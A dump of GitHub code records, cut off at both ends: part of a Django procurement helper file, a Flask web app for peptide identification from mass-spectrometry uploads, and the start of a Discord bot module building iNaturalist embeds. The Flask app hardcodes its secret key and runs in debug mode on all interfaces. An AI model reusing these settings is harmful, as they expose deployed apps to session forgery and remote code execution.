value=None):\n try:\n model_obj = model_cls.objects.get(**{f'{identifier_field}': identifier_value})\n except model_cls.DoesNotExist:\n raise ValidationError(f'{model_cls} matching id does not exist')\n else:\n setattr(model_obj, field_name, value)\n model_obj.save()\n\n\ndef get_prf_field(prf_number=None, field_name=None):\n try:\n prf = PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n raise ValidationError('Purchase Requisition matching id does not exist')\n else:\n return getattr(prf, field_name, None)\n\n\ndef user_signature(user):\n try:\n signature = Signature.objects.get(owner=user)\n except Signature.DoesNotExist:\n raise ValidationError(\n 'Authorising person does not have signature captured, please '\n 'contact admin for assistance on this.')\n else:\n return signature.signature\n\n\ndef is_purchase_requisition(prf_number):\n try:\n PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n return False\n else:\n return True\n\n\ndef is_purchase_order(order_number):\n try:\n PurchaseOrder.objects.get(order_number=order_number)\n except PurchaseOrder.DoesNotExist:\n return False\n else:\n return True\n\n","repo_name":"Botswana-Harvard-Utility-Systems/procurement","sub_path":"procurement/models/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40140584878","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains the Spectra Flask Application application.\"\"\"\n\nimport logging\nimport time\nfrom pathlib import Path\nimport pandas as pd\nfrom pyopenms import *\nimport os\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import Flask, render_template, request, redirect, url_for, flash, session\nfrom werkzeug.utils import secure_filename\n\nfrom project_spectra.Parse_data_MS2 import parse_data_from_MS2\nfrom project_spectra.Spec_peptide import Peptide_identification\nfrom project_spectra.identifier import Identifier\n\nlog = logging.getLogger(__name__)\n\n# Constants\nALLOWED_EXTENSIONS = {'mzml', 'fasta', 'fa'}\n\n# Create upload folder\nupload_folder = Path(Path.home(), '.projectSpectra', 'uploads')\nPath.mkdir(upload_folder, exist_ok=True)\nUPLOAD_FOLDER = str(upload_folder)\n\n\n\"\"\"Create the Flask application\"\"\"\n\nt = time.time()\n\napp = Flask(__name__)\n\nFLASK_PORT = os.environ.get('FLASK_PORT', default=5000)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\napp.config['SECRET_KEY'] = \"1P313P4OO138O4UQRP9343P4AQEKRFLKEQRAS230\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///spectra.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Initialize the database\ndb = SQLAlchemy(app)\nlog.info('Done building %s in %.2f seconds', app, time.time() - t)\n\n\n\"\"\"Build URLs\"\"\"\n\n@app.route(\"/\")\n@app.route(\"/start\")\ndef start():\n\treturn render_template(\"start.html\")\n\n# Home\n@app.route(\"/home\", methods=['GET', 'POST'])\ndef home():\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tfilenames = next(os.walk(UPLOAD_FOLDER), (None, None, []))[2] # Get files\n\tfilenames = [file for file in filenames]\n\t# Check files are uploaded\n\tif filenames:\n\t\texp = MSExperiment()\n\t\tMzMLFile().load(ms2_file, exp)\n\t\tsize = len(exp.getSpectra())\n\treturn render_template('home.html', size = size, my_info =\"\", data_table =\"\",\n\t\t\t\t\t\t p_mz ='', p_c =\"\", number_of_peak = \"-\", min_m_z = \"-\",\n\t\t\t\t\t\t\tmax_m_z = \"-\", max_m_z_peak = \"-\")\n\n# Generate MS summary\n@app.route('/parse', methods=['POST'])\ndef parse_spec():\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tfilenames = next(os.walk(UPLOAD_FOLDER), (None, None, []))[2] # Get files\n\tfilenames = [file for file in filenames]\n\t# Check files are uploaded\n\tif filenames:\n\t\tscan_number = request.form['textbox']\n\t\texp = MSExperiment()\n\t\tMzMLFile().load(ms2_file, exp)\n\t\tm_z = list(exp.getSpectrum(int(scan_number)).get_peaks()[0])\n\t\tintensity = list(exp.getSpectrum(int(scan_number)).get_peaks()[1])\n\n\t\tnumber_of_peak = len(m_z)\n\t\tmin_m_z = round(min(m_z), 2)\n\t\tmax_m_z_peak = round(m_z[intensity.index(max(intensity))], 2)\n\t\tmax_m_z = round(max(m_z), 2)\n\n\t\tprecursor_mz = parse_data_from_MS2(ms2_file, int(scan_number))[2]\n\t\tprecursor_charge = parse_data_from_MS2(ms2_file, int(scan_number))[3]\n\n\t\treturn render_template('home.html', p_mz = precursor_mz, p_c = precursor_charge,\n\t\t\t\t\t\t\t number_of_peak = number_of_peak, min_m_z = min_m_z,\n\t\t\t\t\t\t\t max_m_z = max_m_z, max_m_z_peak = max_m_z_peak)\n\telse:\n\t\tupload_info = \"Please check, no file is uploaded!\"\n\t\treturn render_template('home.html', upload_info = upload_info)\n\n# Plot figure for specific scan\n@app.route('/plot.png', methods=['GET', 'POST'])\ndef plot_png():\n\t\"\"\"Generate the de-isotoped plot of MS2 scan.\"\"\"\n\tfrom project_spectra.Spec_peptide import Peptide_identification\n\timport matplotlib.pyplot as plt\n\timport io\n\timport base64\n\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tscan_number = request.form['textbox']\n\tp = Peptide_identification(ms2_file, int(scan_number))\n\tp.store_one_scan_and_get_deisotoped()\n\texp = MSExperiment()\n\tMzMLFile().load(p.deisotoped_file, exp)\n\tfor spec in exp:\n\t\tfor mz, i in zip(*spec.get_peaks()):\n\t\t\tplt.plot([mz, mz], [0, i], color='black')\n\t\t\tplt.text(mz, i, str(mz))\n\n\t\t# for the title add RT and Precursor m/z and charge info if available\n\t\ttitle = ''\n\t\tif spec.getRT() >= 0:\n\t\t\ttitle += 'RT: ' + str(spec.getRT())\n\t\tif len(spec.getPrecursors()) >= 1:\n\t\t\ttitle += ' Precursor m/z: ' + str(spec.getPrecursors()[0].getMZ()) + ' Charge: ' + str(spec.getPrecursors()[0].getCharge())\n\t\tplt.title(title)\n\t\tplt.ylabel('intensity')\n\t\tplt.xlabel('m/z')\n\t\tplt.ylim(bottom=0)\n\n\timg = io.BytesIO()\n\tplt.savefig(img, format='png')\n\tplt.close()\n\timg.seek(0)\n\tplot_url = base64.b64encode(img.getvalue()).decode('utf8')\n\treturn render_template('plot.html', plot_url=plot_url)\n\n# Determine peptides possible\n@app.route('/peptide', methods=['POST'])\ndef get_peptide_list():\n\t\"\"\"get peptide list\"\"\"\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tscan_number = request.form['textbox']\n\tp = Peptide_identification(ms2_file, int(scan_number))\n\n\ttry:\n\t\tvals = p.compile(show_C_terminal=False)[0]\n\t\tpeaks = p.compile(show_C_terminal=False)[1]\n\t\tsum_intensity = p.compile(show_C_terminal=False)[2]\n\t\tlst = zip(vals, sum_intensity)\n\t\tshow_seq_peak = zip(vals,peaks)\n\t\tresult_p = pd.DataFrame(lst, columns=[\"Sequence\", \"Sum of Relative Peak Intensity\"], dtype=float)\n\t\tresult_delete_duplicate = result_p.drop_duplicates()\n\t\tdata_table_html = result_delete_duplicate.to_html(header=\"true\", table_id=\"table\", index=False, justify=\"justify\", )\n\t\tsession['peptides'] = list(set(vals))\n\t\treturn render_template('home.html', data_table_html=data_table_html, show_seq_peak=show_seq_peak, error_info=\"\")\n\texcept:\n\t\terror_info = \"N/C terminal are not found by the algorithm or no enough AA to match, try another scan number :) \"\n\t\treturn render_template('home.html', error_info=error_info)\n\n# About\n@app.route(\"/about\")\ndef about():\n\treturn render_template(\"about.html\")\n\n# Upload\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n\tif request.method == 'POST':\n\t\tfile = request.files.get('file')\n\t\tclearAllFlag = request.values.get(\"clearall\")\n\n\t\t# if the clear all button is pressed\n\t\tif clearAllFlag:\n\t\t\tclear_all()\n\t\t\tflash('Uploaded files successfully removed', \"info\")\n\t\t\treturn redirect(url_for('upload'))\n\n\t\t# if a file was uploaded\n\t\telif file:\n\t\t\t# if user does not select file, browser also\n\t\t\t# submit an empty part without filename\n\t\t\tif file.filename == '':\n\t\t\t\tflash('No file selected', \"warning\")\n\t\t\t\treturn redirect(url_for('home'))\n\n\t\t\tif file and allowed_file(file.filename):\n\t\t\t\tfilename = secure_filename(file.filename)\n\t\t\t\tfile.save(Path(app.config['UPLOAD_FOLDER'], filename))\n\t\t\t\tprint(file)\n\t\t\t\tflash(f\"File uploaded successfully: '{file.filename}'\", \"info\")\n\t\t\t\treturn redirect(url_for('home'))\n\t\t\telse:\n\t\t\t\tflash(f\"File could not be saved: '{file.filename}'\", \"warning\")\n\t\t\t\treturn redirect(url_for('upload'))\n\n\t\t# if no file was selected\n\t\telse:\n\t\t\tflash(\"Error! No file selected.\", \"warning\")\n\t\t\treturn redirect(url_for('upload'))\n\telse:\n\t\treturn render_template(\"upload.html\")\n\n\ndef allowed_file(filename):\n\treturn '.' in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef clear_all():\n\tfor root, dirs, files in os.walk(UPLOAD_FOLDER):\n\t\tfor file in files:\n\t\t\tos.remove(os.path.join(root, file))\n\treturn\n\n# Compute Protein Matches\n@app.route(\"/proteins\")\ndef protein_matches():\n\t# Run protein identification\n\tif session['peptides']:\n\t\ti = Identifier(sequence=session['peptides'])\n\t\tresult = i.stout\n\n\t\tname = []\n\t\tfull_name = []\n\t\torganism = []\n\t\tfor x, y in result.items():\n\t\t\tname.append(x)\n\t\t\tfull_name.append(y[0])\n\t\t\torganism.append(y[1])\n\t\tdata = {'Accession Number': name, 'Fullname': full_name, 'Organism': organism}\n\t\tdf = pd.DataFrame(data)\n\t\tdata_table_html = df.to_html(header=\"true\", table_id=\"table\", index=False, justify=\"justify\")\n\t\treturn render_template(\"proteins.html\", results = data_table_html)\n\telse:\n\t\terror_info = \"No protein identified.\"\n\t\treturn render_template(\"proteins.html\", info = error_info)\n\n\n'''\n Run app\n'''\nif __name__ == \"__main__\":\n\tflask_port = int(os.environ.get('FLASK_PORT', '5005'))\n\tapp.run(host='0.0.0.0', port=flask_port, debug=True)\n #app.run(host='127.0.0.1', port=5005, debug=True)","repo_name":"danqi123/De_novo_seq-peptide_identification","sub_path":"frontend/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31018942739","text":"\"\"\"Module to handle iNat embed concerns.\"\"\"\r\nimport asyncio\r\nimport contextlib\r\nimport copy\r\nfrom io import BytesIO\r\nimport logging\r\nimport re\r\nfrom typing import Optional, Union\r\nfrom urllib.parse import parse_qs, urlsplit\r\n\r\nimport discord\r\nfrom discord import DMChannel, File\r\nfrom dronefly.core.constants import RANK_LEVELS\r\nfrom dronefly.core.formatters.constants import WWW_BASE_URL\r\nfrom dronefly.core.formatters.generic import (\r\n format_taxon_name,\r\n format_taxon_names,\r\n format_user_link,\r\n LifeListFormatter,\r\n ObservationFormatter,\r\n QualifiedTaxonFormatter,\r\n TaxonFormatter,\r\n)\r\nfrom dronefly.core.utils import lifelists_url_from_query_response, obs_url_from_v1\r\nfrom dronefly.core.parsers.url import (\r\n MARKDOWN_LINK,\r\n PAT_OBS_LINK,\r\n PAT_OBS_QUERY,\r\n PAT_OBS_TAXON_LINK,\r\n PAT_TAXON_LINK,\r\n)\r\nfrom dronefly.core.query.query import EMPTY_QUERY, Query, QueryResponse, TaxonQuery\r\nfrom dronefly.discord.embeds import (\r\n format_taxon_names_for_embed,\r\n make_image_embed,\r\n make_taxa_embed,\r\n MAX_EMBED_DESCRIPTION_LEN,\r\n MAX_EMBED_FILE_LEN,\r\n)\r\nfrom pyinaturalist.constants import ROOT_TAXON_ID\r\nfrom pyinaturalist.models import Place, Taxon, User\r\nfrom redbot.core.commands import BadArgument, Context\r\nfrom redbot.core.utils.predicates import MessagePredicate\r\n\r\nfrom ..embeds.common import (\r\n add_reactions_with_cancel,\r\n make_embed,\r\n NoRoomInDisplay,\r\n)\r\nfrom ..interfaces import MixinMeta\r\nfrom ..maps import INatMapURL\r\nfrom ..projects import UserProject\r\nfrom ..taxa import (\r\n format_place_taxon_counts,\r\n format_user_taxon_counts,\r\n get_taxon,\r\n TAXON_COUNTS_HEADER,\r\n TAXON_COUNTS_HEADER_PAT,\r\n TAXON_PLACES_HEADER,\r\n TAXON_PLACES_HEADER_PAT,\r\n TAXON_NOTBY_HEADER,\r\n TAXON_NOTBY_HEADER_PAT,\r\n TAXON_IDBY_HEADER,\r\n TAXON_IDBY_HEADER_PAT,\r\n)\r\nfrom ..utils import get_lang, has_valid_user_config\r\n\r\nlogger = logging.getLogger(\"red.dronefly.\" + __name__)\r\n\r\nHIERARCHY_PAT = re.compile(r\".*?(?=>)\", re.DOTALL)\r\nNO_TAXONOMY_PAT = re.compile(r\"(\\n__.*)?$\", re.DOTALL)\r\nSHORT_DATE_PAT = re.compile(\r\n r\"(^.*\\d{1,2}:\\d{2}(:\\d{2})?(\\s+(am|pm))?)(.*$)\", flags=re.I\r\n)\r\nTAXONOMY_PAT = re.compile(r\"in:(?P.*?(?=\\n__.*$)|.*$)\", re.DOTALL)\r\n\r\nOBS_ID_PAT = re.compile(r\"\\(.*/observations/(?P\\d+).*?\\)\")\r\nPLACE_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]place_id=(?P\\d+).*?\\)\"\r\n)\r\nUNOBSERVED_BY_USER_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]unobserved_by_user_id=(?P\\d+).*?\\)\",\r\n)\r\nID_BY_USER_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]ident_user_id=(?P\\d+).*?\\)\",\r\n)\r\nUSER_ID_PAT = re.compile(r\"\\n\\[[0-9 \\(\\)]+\\]\\(.*?[\\?\\&]user_id=(?P\\d+).*?\\)\")\r\n\r\nREACTION_EMOJI = {\r\n \"self\": \"\\N{BUST IN SILHOUETTE}\",\r\n \"user\": \"\\N{BUSTS IN SILHOUETTE}\",\r\n \"home\": \"\\N{HOUSE BUILDING}\",\r\n \"place\": \"\\N{EARTH GLOBE EUROPE-AFRICA}\",\r\n \"taxonomy\": \"\\N{REGIONAL INDICATOR SYMBOL LETTER T}\",\r\n}\r\nTAXON_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"self\", \"user\", \"taxonomy\"]))\r\nNO_PARENT_TAXON_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"self\", \"user\"]))\r\nTAXON_PLACE_REACTION_EMOJIS = list(\r\n map(REACTION_EMOJI.get, [\"home\", \"place\", \"taxonomy\"])\r\n)\r\nNO_PARENT_TAXON_PLACE_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"home\", \"place\"]))\r\nOBS_REACTION_EMOJIS = NO_PARENT_TAXON_REACTION_EMOJIS\r\nOBS_PLACE_REACTION_EMOJIS = NO_PARENT_TAXON_PLACE_REACTION_EMOJIS\r\n\r\n# pylint: disable=no-member, assigning-non-slot\r\n# - See https://github.com/PyCQA/pylint/issues/981\r\n\r\n\r\nclass INatEmbed(discord.Embed):\r\n \"\"\"Base class for INat embeds.\"\"\"\r\n\r\n taxon_url: str = None\r\n obs_url: str = None\r\n taxonomy: str = None\r\n params: dict = {}\r\n\r\n @classmethod\r\n def from_discord_embed(cls, embed: discord.Embed):\r\n \"\"\"Create an iNat embed from a discord.Embed.\"\"\"\r\n return cls.from_dict(embed.to_dict())\r\n\r\n @classmethod\r\n def from_dict(cls, data: dict):\r\n \"\"\"Create an iNat embed from a dict.\"\"\"\r\n inat_embed = super(cls, INatEmbed).from_dict(data)\r\n inat_embed.obs_url = inat_embed.get_observations_url()\r\n inat_embed.taxon_url, taxon_id = inat_embed.get_taxon_url()\r\n inat_embed.taxonomy = inat_embed.get_taxonomy()\r\n inat_embed.params = inat_embed.get_params(taxon_id)\r\n return inat_embed\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.obs_url = self.get_observations_url()\r\n self.taxon_url, taxon_id = self.get_taxon_url()\r\n self.taxonomy = self.get_taxonomy()\r\n self.params = self.get_params(taxon_id)\r\n\r\n def get_observations_url(self):\r\n \"\"\"Return observations url, if present.\"\"\"\r\n if self.url:\r\n if re.match(PAT_OBS_QUERY, self.url):\r\n return self.url\r\n if self.description:\r\n mat_single_obs = re.search(PAT_OBS_LINK, self.description)\r\n if mat_single_obs:\r\n return mat_single_obs[\"url\"]\r\n # Could be observations search, e.g. first link in description\r\n # of a taxon display. PAT_OBS_QUERY is greedy so cannot be used\r\n # against description! Match the first link first, and then the\r\n # obs query within it.\r\n mat_first_link = (\r\n re.search(MARKDOWN_LINK, self.description) if self.description else None\r\n )\r\n if mat_first_link:\r\n mat = re.search(PAT_OBS_QUERY, mat_first_link[\"url\"])\r\n if mat:\r\n return mat[\"url\"]\r\n return None\r\n\r\n def get_taxon_url(self):\r\n \"\"\"Return taxon url and the taxon_id in it, if present.\"\"\"\r\n if self.url:\r\n mat = re.match(PAT_TAXON_LINK, self.url)\r\n if mat:\r\n return (mat[\"url\"], mat[\"taxon_id\"])\r\n if self.description:\r\n mat_taxon = re.search(PAT_TAXON_LINK, self.description)\r\n if mat_taxon:\r\n return (mat_taxon[\"url\"], mat_taxon[\"taxon_id\"])\r\n return (None, None)\r\n\r\n def get_taxonomy(self):\r\n \"\"\"Return taxonomy for the embed.\"\"\"\r\n if not self.description:\r\n return \"\"\r\n mat = re.search(TAXONOMY_PAT, self.description)\r\n if mat:\r\n return mat[\"taxonomy\"]\r\n return \"\"\r\n\r\n def get_params(self, taxon_id=None):\r\n \"\"\"Return recognized params for the embed.\"\"\"\r\n url = self.obs_url or self.taxon_url or self.url\r\n if self.params or not url:\r\n return self.params\r\n\r\n params = parse_qs(urlsplit(url).query)\r\n # TODO: we should leave these as-is and use urlencode with doseq=True\r\n # instead to put the URL back together later\r\n new_params = {key: \",\".join(params[key]) for key in params}\r\n if taxon_id:\r\n new_params[\"taxon_id\"] = taxon_id\r\n return new_params\r\n\r\n def inat_content_as_dict(self):\r\n \"\"\"Return iNat content from embed as dict.\"\"\"\r\n content = dict()\r\n content[\"listed_id_by_user_ids\"] = self.listed_id_by_user_ids()\r\n content[\"listed_not_by_user_ids\"] = self.listed_not_by_user_ids()\r\n content[\"listed_place_ids\"] = self.listed_place_ids()\r\n content[\"listed_user_ids\"] = self.listed_user_ids()\r\n content[\"listed_observation_ids\"] = self.listed_observation_ids()\r\n content[\"place_id\"] = self.place_id()\r\n content[\"taxon_id\"] = self.taxon_id()\r\n content[\"user_id\"] = self.user_id()\r\n content[\"unobserved_by_user_id\"] = self.unobserved_by_user_id()\r\n content[\"not_user_id\"] = self.not_user_id()\r\n content[\"ident_user_id\"] = self.ident_user_id()\r\n content[\"project_id\"] = self.project_id()\r\n content[\"taxon_url\"] = self.taxon_url\r\n content[\"obs_url\"] = self.obs_url\r\n content[\"params\"] = self.params\r\n content[\"taxonomy\"] = self.taxonomy\r\n content[\"query\"] = str(self.query())\r\n return content\r\n\r\n def query(self, query: Query = EMPTY_QUERY): # Query\r\n \"\"\"Produce a query from embed, merging new query if given.\"\"\"\r\n\r\n main = None\r\n if query.main and query.main.terms and query.main.terms[0] == \"any\":\r\n main = query.main\r\n if not main and self.taxon_id():\r\n main = TaxonQuery(taxon_id=self.taxon_id())\r\n user = query.user or self.user_id()\r\n id_by = query.id_by or self.ident_user_id()\r\n unobserved_by = query.unobserved_by or self.unobserved_by_user_id()\r\n except_by = query.except_by or self.not_user_id()\r\n place = query.place or self.place_id()\r\n project = query.project or self.project_id()\r\n controlled_term = query.controlled_term or self.controlled_term()\r\n query = Query(\r\n main=main,\r\n user=user,\r\n id_by=id_by,\r\n unobserved_by=unobserved_by,\r\n except_by=except_by,\r\n place=place,\r\n project=project,\r\n controlled_term=controlled_term,\r\n )\r\n return query\r\n\r\n def has_users(self):\r\n \"\"\"Embed has a user counts table.\"\"\"\r\n return bool(re.search(TAXON_COUNTS_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_id_by_users(self):\r\n \"\"\"Embed has an id by user counts table.\"\"\"\r\n return bool(re.search(TAXON_IDBY_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_not_by_users(self):\r\n \"\"\"Embed has a not by user counts table.\"\"\"\r\n return bool(re.search(TAXON_NOTBY_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_observations(self):\r\n \"\"\"Embed has listed observations (e.g. from `[p]search obs`).\"\"\"\r\n return bool(re.search(OBS_ID_PAT, self.description or \"\"))\r\n\r\n def has_places(self):\r\n \"\"\"Embed has a place counts table.\"\"\"\r\n # prevent misdetect as 'not by' (unobserved_by_user_id=# can have a place filter applied)\r\n return bool(re.search(TAXON_PLACES_HEADER_PAT, self.description or \"\"))\r\n\r\n def listed_id_by_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_id_by_users():\r\n return None\r\n\r\n return [int(id) for id in re.findall(ID_BY_USER_ID_PAT, self.description)]\r\n\r\n def listed_not_by_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_not_by_users():\r\n return None\r\n\r\n return [\r\n int(id) for id in re.findall(UNOBSERVED_BY_USER_ID_PAT, self.description)\r\n ]\r\n\r\n def listed_observation_ids(self):\r\n \"\"\"Return listed observations, if present.\"\"\"\r\n if not self.has_observations():\r\n return None\r\n\r\n return [int(id) for id in re.findall(OBS_ID_PAT, self.description)]\r\n\r\n def listed_place_ids(self):\r\n \"\"\"Return listed places, if present.\"\"\"\r\n if not self.has_places():\r\n return None\r\n\r\n return [int(id) for id in re.findall(PLACE_ID_PAT, self.description)]\r\n\r\n def listed_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_users():\r\n return None\r\n\r\n return [int(id) for id in re.findall(USER_ID_PAT, self.description)]\r\n\r\n def place_id(self):\r\n \"\"\"Return place_id(s) from embed, if present.\"\"\"\r\n place_id = self.params.get(\"place_id\")\r\n return int(place_id) if place_id else None\r\n\r\n def project_id(self):\r\n \"\"\"Return project_id(s) from embed, if present.\"\"\"\r\n project_id = self.params.get(\"project_id\")\r\n return int(project_id) if project_id else None\r\n\r\n def taxon_id(self):\r\n \"\"\"Return taxon_id(s) from embed, if present.\"\"\"\r\n taxon_id = self.params.get(\"taxon_id\")\r\n return int(taxon_id) if taxon_id else None\r\n\r\n def controlled_term(self):\r\n term_id = self.params.get(\"term_id\")\r\n if not term_id:\r\n return None\r\n term_value_id = self.params.get(\"term_value_id\")\r\n if not term_value_id:\r\n return str(term_id)\r\n return \"{} {}\".format(term_id, term_value_id)\r\n\r\n def user_id(self):\r\n \"\"\"Return user_id(s) from embed, if present.\"\"\"\r\n user_id = self.params.get(\"user_id\")\r\n return int(user_id) if user_id else None\r\n\r\n def unobserved_by_user_id(self):\r\n \"\"\"Return unobserved_by_user_id(s) from embed, if present.\"\"\"\r\n unobserved_by_user_id = self.params.get(\"unobserved_by_user_id\")\r\n return int(unobserved_by_user_id) if unobserved_by_user_id else None\r\n\r\n def not_user_id(self):\r\n \"\"\"Return not_user_id(s) from embed, if present.\"\"\"\r\n not_user_id = self.params.get(\"not_user_id\")\r\n return int(not_user_id) if not_user_id else None\r\n\r\n def ident_user_id(self):\r\n \"\"\"Return ident_user_id(s) from embed, if present.\"\"\"\r\n ident_user_id = self.params.get(\"ident_user_id\")\r\n return int(ident_user_id) if ident_user_id else None\r\n\r\n\r\n# TODO: refactor these two helpers as a single context manager so we can\r\n# supply custom emoji sets in the context block.\r\ndef _add_place_emojis(query_response: QueryResponse, is_taxon_embed: bool = False):\r\n if not query_response:\r\n return False\r\n if is_taxon_embed:\r\n return query_response.place and not query_response.user\r\n return query_response.place and not (\r\n query_response.user or query_response.id_by or query_response.unobserved_by\r\n )\r\n\r\n\r\n# Note: always call this after _add_place_emojis\r\ndef _add_user_emojis(query_response: QueryResponse):\r\n if not query_response:\r\n return True\r\n return not query_response.except_by\r\n\r\n\r\nEMOJI = {\r\n \"research\": \":white_check_mark:\",\r\n \"needs_id\": \":large_orange_diamond:\",\r\n \"casual\": \":white_circle:\",\r\n \"fave\": \":star:\",\r\n \"comment\": \":speech_left:\",\r\n \"community\": \":busts_in_silhouette:\",\r\n \"image\": \":camera:\",\r\n \"sound\": \":sound:\",\r\n \"ident\": \":label:\",\r\n}\r\n\r\n\r\n# Note: Consider broadening scope of module to INatHelpers to encompass things\r\n# like check_taxon_query, or else split to own mixin.\r\nclass INatEmbeds(MixinMeta):\r\n \"\"\"Provide embeds for iNatCog.\"\"\"\r\n\r\n def check_taxon_query(self, ctx, query):\r\n \"\"\"Check for valid taxon query.\"\"\"\r\n if not isinstance(query, Query):\r\n return\r\n if not query.main:\r\n args = ctx.message.content.split(\" \", 1)[1]\r\n reason = (\r\n \"I don't understand that query.\\nPerhaps you meant one of:\\n\"\r\n f\"`{ctx.clean_prefix}tab {args}`\\n\"\r\n f\"`{ctx.clean_prefix}obs {args}`\\n\"\r\n f\"`{ctx.clean_prefix}search obs {args}`\"\r\n )\r\n raise BadArgument(reason)\r\n\r\n async def make_last_obs_embed(self, ctx, last):\r\n \"\"\"Return embed for recent observation link.\"\"\"\r\n if last.obs:\r\n obs = last.obs\r\n embed = await self.make_obs_embed(ctx, obs, url=last.url, preview=False)\r\n else:\r\n embed = make_embed(url=last.url)\r\n mat = re.search(PAT_OBS_LINK, last.url)\r\n obs_id = int(mat[\"obs_id\"])\r\n logger.debug(\"Observation not found for link: %d\", obs_id)\r\n embed.title = \"No observation found for id: %d (deleted?)\" % obs_id\r\n\r\n shared_by = f\"· shared {last.ago}\"\r\n if last.name:\r\n shared_by += f\" by @{last.name}\"\r\n embed.description = (\r\n f\"{embed.description}\\n\\n{shared_by}\" if embed.description else shared_by\r\n )\r\n return embed\r\n\r\n async def make_map_embed(self, ctx, taxa, missing_taxa=None, lang=None):\r\n \"\"\"Return embed for an observation link.\"\"\"\r\n lang = await get_lang(ctx)\r\n title = format_taxon_names_for_embed(\r\n taxa, with_term=True, names_format=\"Range map for %s\", lang=lang\r\n )\r\n inat_map_url = INatMapURL(self.api)\r\n url = await inat_map_url.get_map_url_for_taxa(taxa)\r\n embed = make_embed(title=title, url=url)\r\n if missing_taxa:\r\n embed.set_footer(\r\n text=f\"Some taxa could not be found and were ignored: {','.join(missing_taxa)}\"\r\n )\r\n return embed\r\n\r\n @contextlib.asynccontextmanager\r\n async def sound_message_params(\r\n self, channel, sounds: list, embed: discord.Embed, index=0\r\n ):\r\n \"\"\"Given a sound URL, yield params to send embed with file (if possible) or just URL.\"\"\"\r\n if not sounds:\r\n yield None\r\n return\r\n sound = sounds[index]\r\n if isinstance(channel, DMChannel):\r\n url_only = False\r\n max_embed_file_size = MAX_EMBED_FILE_LEN\r\n else:\r\n url_only = not channel.permissions_for(channel.guild.me).attach_files\r\n # Boosts could make this > default 8M maximum (95% due to overhead)\r\n max_embed_file_size = channel.guild.filesize_limit * 0.95\r\n sound_io = None\r\n\r\n async with self.api.session.get(sound.url) as response:\r\n try:\r\n filename = response.url.name\r\n sound_bytes = await response.read()\r\n except OSError:\r\n filename = None\r\n sound_bytes = None\r\n\r\n _embed = make_embed()\r\n title = \"Sound recording\"\r\n if len(sounds) > 1:\r\n title += f\" ({index + 1} of {len(sounds)})\"\r\n if filename:\r\n title += f\": {filename}\"\r\n _embed.title = title\r\n _embed.url = sound.url\r\n _embed.set_footer(text=sound.attribution)\r\n embeds = [embed, _embed]\r\n _params = {\"embeds\": embeds}\r\n\r\n if not url_only:\r\n if len(sound_bytes) <= max_embed_file_size:\r\n sound_io = BytesIO(sound_bytes)\r\n\r\n if sound_io:\r\n _params[\"file\"] = File(sound_io, filename=filename)\r\n yield _params\r\n sound_io.close()\r\n return\r\n\r\n yield _params\r\n\r\n async def summarize_obs_spp_counts(self, taxon, obs_args):\r\n observations = await self.api.get_observations(per_page=0, **obs_args)\r\n if observations:\r\n species = await self.api.get_observations(\r\n \"species_counts\", per_page=0, **obs_args\r\n )\r\n observations_count = observations[\"total_results\"]\r\n species_count = species[\"total_results\"]\r\n url = obs_url_from_v1(obs_args)\r\n species_url = obs_url_from_v1({**obs_args, \"view\": \"species\"})\r\n if taxon and RANK_LEVELS[taxon.rank] <= RANK_LEVELS[\"species\"]:\r\n summary_counts = f\"Total: [{observations_count:,}]({url})\"\r\n else:\r\n summary_counts = (\r\n f\"Total: [{observations_count:,}]({url}) \"\r\n f\"Species: [{species_count:,}]({species_url})\"\r\n )\r\n return summary_counts\r\n return \"\"\r\n\r\n def make_life_list_embed(self, formatter: LifeListFormatter):\r\n \"\"\"Return embed for life list.\"\"\"\r\n query_response = formatter.query_response\r\n embed = make_embed(title=f\"Life list {query_response.obs_query_description()}\")\r\n if query_response.user:\r\n embed.url = lifelists_url_from_query_response(query_response)\r\n embed.description = formatter.format_page(0)\r\n last_page = formatter.last_page() + 1\r\n if last_page > 1:\r\n embed.set_footer(text=f\"Page 1/{last_page}\")\r\n return embed\r\n\r\n async def make_obs_counts_embed(self, query_response: QueryResponse):\r\n \"\"\"Return embed for observation counts from place or by user.\"\"\"\r\n formatted_counts = \"\"\r\n taxon = query_response.taxon\r\n user = query_response.user\r\n place = query_response.place\r\n unobserved_by = query_response.unobserved_by\r\n id_by = query_response.id_by\r\n count_args = query_response.obs_args()\r\n\r\n title_query_response = copy.copy(query_response)\r\n description = \"\"\r\n if user 